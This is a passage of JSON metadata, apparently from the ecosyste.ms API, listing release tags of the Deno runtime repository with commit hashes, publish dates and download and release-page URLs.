Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"d